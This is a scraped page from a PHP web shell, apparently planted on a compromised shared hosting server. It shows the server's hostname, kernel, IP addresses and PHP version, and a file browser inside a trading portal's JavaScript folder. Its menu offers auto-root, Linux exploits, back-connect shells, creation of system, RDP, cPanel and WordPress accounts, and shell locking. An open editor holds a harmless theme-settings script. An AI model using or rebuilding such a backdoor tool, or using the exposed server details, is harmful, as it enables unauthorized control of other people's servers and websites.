Linux host40.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
: 68.65.120.213 | : 216.73.216.131
Cant Read [ /etc/named.conf ]
7.4.33
trade
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
trade /
portal.tradesense.co.ke /
public /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
dashboard
[ DIR ]
drwxr-xr-x
plugins-init
[ DIR ]
drwxr-xr-x
calendar-2.js
2.13
KB
-rw-r--r--
calendar.js
2.44
KB
-rw-r--r--
custom.min.js
16.98
KB
-rw-r--r--
demo-2.js
7.68
KB
-rw-r--r--
deznav-2-init.js
1.31
KB
-rw-r--r--
deznav-init.js
1.31
KB
-rw-r--r--
highlight.min.js
54.46
KB
-rw-r--r--
invoice.js
360
B
-rw-r--r--
styleSwitcher.js
21.76
KB
-rw-r--r--
user.js
548
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : deznav-init.js
"use strict" var dzSettingsOptions = {}; function getUrlParams(dParam) { var dPageURL = window.location.search.substring(1), dURLVariables = dPageURL.split('&'), dParameterName, i; for (i = 0; i < dURLVariables.length; i++) { dParameterName = dURLVariables[i].split('='); if (dParameterName[0] === dParam) { return dParameterName[1] === undefined ? true : decodeURIComponent(dParameterName[1]); } } } (function($) { "use strict" /* var direction = getUrlParams('dir'); if(direction == 'rtl') { direction = 'rtl'; }else{ direction = 'ltr'; } */ dzSettingsOptions = { typography: "outfit", version: "light", layout: "vertical", primary: "color_1", headerBg: "color_1", navheaderBg: "color_2", sidebarBg: "color_2", sidebarStyle: "mini", sidebarPosition: "fixed", headerPosition: "fixed", containerLayout: "full", }; new dzSettings(dzSettingsOptions); jQuery(window).on('resize',function(){ /*Check container layout on resize */ ///alert(dzSettingsOptions.primary); dzSettingsOptions.containerLayout = $('#container_layout').val(); /*Check container layout on resize END */ new dzSettings(dzSettingsOptions); }); })(jQuery);
Close